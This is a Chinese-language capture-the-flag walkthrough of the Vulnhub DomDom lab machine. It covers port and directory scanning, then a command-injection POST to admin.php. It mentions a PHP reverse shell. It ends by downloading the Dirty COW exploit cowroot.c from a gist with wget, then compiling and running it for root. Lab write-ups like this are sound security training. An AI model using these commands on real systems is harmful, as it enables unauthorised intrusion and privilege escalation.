经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
DomDom: 1 Vulnhub Walkthrough - APT-101
来源:cnblogs  作者:APT-101  时间:2019/8/15 12:11:15  对本文有异议

 

主机层面扫描:

╰─ nmap -p1-65535 -A -sV 10.10.202.140

You name 存在XSS 漏洞

右键源码有隐藏form表单

修改其type属性为:text

尝试了SQL注入貌似无注入

wfuzz 下目录试试

+ http://10.10.202.140/admin.php (CODE:200|SIZE:329)
+ http://10.10.202.140/index.php (CODE:200|SIZE:694)
+ http://10.10.202.140/server-status (CODE:403|SIZE:301)

http://10.10.202.140/admin.php

Welcome to DomDom !

You need to know it's your actions that will show you the light.

我们尝试POST数据到admin.php接口

看到这个界面,试试能不能执行系统命令

不知道没执行还是没回显到前台来,我们尝试把参数加到boday中去

POST /admin.php HTTP/1.1
Host: 10.10.202.140
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

name=admin&username=admin&password=admin&access=access&cmd=id

 

看来RCE是可以执行的,我们尝试下载远程php-resver.php 试试

http://10.10.202.140/php-reverse.php

进行提权操作:

 

$ wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

$ gcc cowroot.c -o cowroot -pthread

$ ./cowroot

完结!

原文链接:http://www.cnblogs.com/hack404/p/11347051.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号